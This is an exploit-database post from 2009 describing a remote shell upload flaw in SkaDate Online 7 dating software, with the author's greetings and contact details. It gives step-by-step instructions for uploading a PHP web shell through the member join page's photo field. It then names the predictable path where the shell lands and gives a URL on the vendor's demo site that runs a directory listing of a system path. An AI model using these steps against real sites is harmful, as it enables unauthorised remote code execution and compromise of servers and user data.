[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SkaDate Online 7 Remote Shell Upload Vulnerability
# Published : 2009-02-11
# Author : ZoRLu
# Previous Title : Baran CMS 1.0 Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulns
# Next Title : Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities
[~] SkaDate Dating Remote Shell Upload
[~]
[~] Script: http://www.bpowerhouse.com/demos/traveling
[~] ----------------------------------------------------------
[~] home: yildirimordulari.com online if you wanna hel you must register to my site and ?? will do help tp you xD
[~]
[~] home: yildirimordulari.com eger yardim istiyosan siteye uye olmalisin xD
[~]
[~] author: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] Date:11/02/09
[~]
[~] My Best Friend: Dr.LY0N
[~] -----------------------------------------------------------
you go here : http://www.yildirim.com/demo/member/join.php
select your photo but photo must be your shell.php
after you saw this: unallowable file extension "php" but no problem
your shell here: http://www.yildirim.com/demo/$userfiles/tmp/[id].php
for demo:
here: http://www.skadate.com/demo/member/join.php
shell: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php
dont forget: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php?act=ls&d=%2Fetc%2Fvdomainaliases
( sizce hack benim umrumdamI )
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Dr.LY0N & z3h!r & HEAD_HUNTER and yildirimordulari.com all users
[~]
[~] yildirimordulari.com & experl.com & z0rlu.blogspot.com
[~]
[~]----------------------------------------------------------------------
# www.Syue.com [2009-02-11]